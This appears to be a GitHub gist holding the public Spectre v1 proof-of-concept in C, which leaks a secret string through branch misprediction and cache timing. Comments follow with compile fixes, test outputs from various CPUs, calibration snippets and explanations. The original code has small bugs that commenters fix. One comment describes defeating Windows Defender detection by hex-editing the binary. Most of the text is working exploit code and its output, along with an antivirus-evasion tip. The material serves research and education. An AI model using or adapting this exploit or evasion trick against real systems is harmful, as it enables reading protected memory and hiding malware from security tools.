#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
uint8_t array2[256 * 512];
char *secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
  if (x < array1_size) {
    temp &= array2[array1[x] * 512];
  }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  static int results[256];
  int tries, i, j, k, mix_i, junk = 0;
  size_t training_x, x;
  register uint64_t time1, time2;
  volatile uint8_t *addr;

  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {
    /* Flush array2[256*(0..255)] from cache */
    for (i = 0; i < 256; i++)
      _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush(&array1_size);
      for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x));

      /* Call the victim! */
      victim_function(x);
    }

    /* Time reads. Order is lightly mixed up to prevent stride prediction */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = &array2[mix_i * 512];
      time1 = __rdtscp(&junk); /* READ TIMER */
      junk = *addr; /* MEMORY ACCESS TO TIME */
      time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
      if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }

    /* Locate highest & second-highest results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0 */
  }
  results[0] ^= junk; /* use junk so code above won't get optimized out */
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}

int main(int argc, const char **argv) {
  size_t malicious_x = (size_t)(secret - (char *) array1); /* default for malicious_x */
  int i, score[2], len = 40;
  uint8_t value[2];

  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    sscanf(argv[1], "%p", (void **)(&malicious_x));
    malicious_x -= (size_t) array1; /* Convert input value into a pointer */
    sscanf(argv[2], "%d", &len);
  }

  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void *) malicious_x);
    readMemoryByte(malicious_x++, value, score);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    printf("0x%02X='%c' score=%d ", value[0],
      (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  return (0);
}
@kingsumos very nice find indeed! thank you!
It is just a little surprising... an i7-6700HQ, linux v4.9.74, no grsec, is supposedly not affected, but I don't believe that. I'll watch the repo and wait for improvements.
@kuleszdl, well yes, I just had it at hand to test ;) But, as I mention, with that mod, you can test all kinds of architectures supported by Linux.
Had to tweak a little bit.
1 - #define CACHE_HIT_THRESHOLD (80)
- Add a space between the macro name (whatever you wanna call it) and the value.
2 - printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
- Fix the formatting and replace the string "?" with the character '?' (both corrected lines are shown together a little further down).
PS: I'm not a low-level kind of guy, bear with me.
Got the expected output, which is kind of worrying, but there's no point worrying about it anyway. We're fucked.
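For anyone else patching the gist by hand, the two corrected lines from the tweaks above look roughly like this once both fixes are applied (same changes as described, just shown together):

#define CACHE_HIT_THRESHOLD (80) /* space added: object-like macro instead of a malformed function-like one */

printf("0x%02X='%c' score=%d ", value[0],
  (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]); /* '?' is a char constant, matching %c */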
Strange, it works for me even though I already have the intel-microcode patch installed on Ubuntu: https://usn.ubuntu.com/usn/usn-3531-1/
Intel(R) Core(TM) i3 CPU 540 @ 3.07GHz
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdffb08... Success: 0x54='T' score=2
Reading at malicious_x = 0xffffffffffdffb09... Success: 0x68='h' score=2
Reading at malicious_x = 0xffffffffffdffb0a... Success: 0x65='e' score=7 (second best: 0x00 score=1)
Reading at malicious_x = 0xffffffffffdffb0b... Success: 0x20=' ' score=7 (second best: 0x87 score=1)
...
AMD A8-4500M APU with Radeon(tm) HD Graphics
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfebb8... Success: 0xFF='�' score=0
Reading at malicious_x = 0xffffffffffdfebb9... Success: 0xFF='�' score=0
Reading at malicious_x = 0xffffffffffdfebba... Success: 0xFF='�' score=0
Reading at malicious_x = 0xffffffffffdfebbb... Success: 0xFF='�' score=0
...
@rhalff The microcode does not fix within process Spectre exploitation. It only adds instructions for the OS to reset the branch predictor when switching between processes. Full mitigation of within process Spectre would require disabling branch prediction all together. Leading to Intel Atom <2013 speeds, at approximately 1/6th of the performance you have now.
@HenkPoley The example is about in-process exploits. Browsers will fix it. I am not sure if virtual machines can somehow be exploited this way.
There is an error in the code:
#define CACHE_HIT_THRESHOLD(80) should be #define CACHE_HIT_THRESHOLD 80.
After changing #define CACHE_HIT_THRESHOLD(80)
to #define CACHE_HIT_THRESHOLD (100)
it worked on an AMD A8-4500M running Ubuntu 16.04.
Could someone explain what this part of the code is doing?
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
  mix_i = ((i * 167) + 13) & 255;
  addr = &array2[mix_i * 512];
  time1 = __rdtscp(&junk); /* READ TIMER */
  junk = *addr; /* MEMORY ACCESS TO TIME */
  time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
  if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
    results[mix_i]++; /* cache hit - add +1 to score for this value */
}
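In case it helps: that loop is the Flush+Reload probe. Below is a minimal, stand-alone sketch of the same timing idea (the names probe and time_one_read are made up for illustration; this is not part of the gist). A load from a line that is already cached completes in far fewer cycles than a load from a line that was just flushed, and that difference is what CACHE_HIT_THRESHOLD separates.

#include <stdio.h>
#include <stdint.h>
#include <x86intrin.h>

static uint8_t probe[4096];

/* Time a single load with rdtscp; returns elapsed cycles. */
static uint64_t time_one_read(volatile uint8_t *addr) {
  unsigned int junk;
  uint64_t t0 = __rdtscp(&junk);   /* timestamp before the load */
  junk = *addr;                    /* the memory access being timed */
  return __rdtscp(&junk) - t0;     /* timestamp after, minus before */
}

int main(void) {
  volatile uint8_t *addr = &probe[0];
  *addr = 1;                                  /* touch the page so it is mapped and cached */
  uint64_t hit = time_one_read(addr);         /* line should be cached: fast */
  _mm_clflush((void *)addr);                  /* evict the line */
  uint64_t miss = time_one_read(addr);        /* line should be uncached: slow */
  printf("cached: %llu cycles, flushed: %llu cycles\n",
         (unsigned long long)hit, (unsigned long long)miss);
  return 0;
}

The loop in the gist does that timed read once per possible byte value (256 slots of array2), walks them in a scrambled order (mix_i = (i*167+13) & 255) so a stride prefetcher can't predict the next address, and bumps results[mix_i] whenever the read comes back at or under CACHE_HIT_THRESHOLD. The slot that comes back fast is the one the speculative access in victim_function touched, i.e. the secret byte.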
Added:
#include <conio.h>
#include <ctype.h>

and at the end of main():
printf("Press Any Key to Continue\n");
_getch(); // waits for a keypress before quitting when compiled as a Windows executable (.exe)
return 0;
}
I found something: if you hex edit the first byte from 4D to 00, Windows Defender completely ignores spectre.exe :o
Is this code supposed to work on Ubuntu 18.04 (patched)?
It's working on mine!! Scary!
This code is very nice -- clever ways to switch between the malicious and training x values, keeping it parameterized and still working, etc.
Question: Can someone please explain why it's required to make array2 so large? I understand the 256 entries needed for each possible byte value in the reload section of the code, and at least 64 bytes per entry for the 64B cache line size. However, I noticed that changing array2[256 * 512] to something like array2[256 * 64] does not work. I cannot think of an architectural or microarchitectural reason for why this might be. In gem5 simulation, if you have larger L2s, it appears an even larger array2 size is needed. However, my understanding is that the clflush instruction should remove the line from the entire cache hierarchy. It almost seems like array2 must be larger than the L2 size, which doesn't make sense to me since it should be evicted each attack iteration...
Kali GNU/Linux Rolling (VM)
Intel(R) Core(TM) i7-4910MQ CPU @ 2.90GHz
gcc -std=c11 -o spectre spectre.c
+++++++++++++++++++++++++++++++
A steady score of 2.
Questions => What is the meaning of "score"?
=> Why the score difference between i7 and Xeon?
Score represents how many cache hits of that value were detected. Cache hits indicate the likelihood that the value was part of the secret character being read. If, out of all 256 values, that value is the only one to hit for 2 consecutive iterations, the code marks that as a successful read, which is why you're getting scores of 2 (high confidence). If other values also have cache hits, it keeps running the attack until the best value has at least twice the hits of any other value plus 5 (i.e., a score of 9 is required if some other value hit 2 times: 2*2+5).
If you have the same binary, it's checking for the same timing differences to determine cache hits from misses. An i7 and a Xeon can produce different scores due to microarchitectural differences: cache delays, prefetchers, branch predictors, etc. The timing of cache hits and misses is processor dependent and may need adjustments to the CACHE_HIT_THRESHOLD value. Also, if features such as SMT/Hyper-Threading are enabled on one of them, this can also impact the timing while the process runs.
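Following up on the threshold point: if 80 cycles doesn't cleanly separate hits from misses on a given machine, one way to pick a value empirically (just a sketch under my own assumptions, not part of the original PoC; buf and avg_cycles are made-up names) is to time a known-cached and a known-flushed read many times and put the threshold between the two averages:

#include <stdio.h>
#include <stdint.h>
#include <x86intrin.h>

static uint8_t buf[4096];

/* Average latency in cycles of one load, optionally flushing the line first. */
static uint64_t avg_cycles(int flush_first, int rounds) {
  volatile uint8_t *addr = &buf[0];
  unsigned int junk;
  uint64_t total = 0;
  for (int r = 0; r < rounds; r++) {
    if (flush_first)
      _mm_clflush((void *)addr);   /* guarantee a miss */
    else
      junk = *addr;                /* warm the line so the timed read hits */
    uint64_t t0 = __rdtscp(&junk);
    junk = *addr;                  /* the load being timed */
    total += __rdtscp(&junk) - t0;
  }
  return total / rounds;
}

int main(void) {
  buf[0] = 1;
  uint64_t hit = avg_cycles(0, 1000);
  uint64_t miss = avg_cycles(1, 1000);
  printf("avg hit: %llu cycles, avg miss: %llu cycles, midpoint: %llu\n",
         (unsigned long long)hit, (unsigned long long)miss,
         (unsigned long long)((hit + miss) / 2));
  return 0;
}

Something around the midpoint (or a bit below it, to be conservative) is the kind of per-machine value that the 80 -> 100 change reported above for the AMD A8 reflects.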
Hey, they're using your code on computerphile! :D
https://www.youtube.com/watch?v=I5mRwzVvFGE
Why are the victim code and the attacker code in the same process in Spectre v1?
I don't know enough about the Spectre attack; I hope someone can help me with this question.
Why does the Spectre v1 PoC put the victim code and the attacker code in the same process? Shouldn't the attacker, in reality, be attacking the victim across processes?
@dnffabs Because it is what it is: a proof of concept, not the actual attack.
@adrb: The Allwinner H3 uses cortex A7 cores, but it's good to confirm ARM's report about A7 not being affected.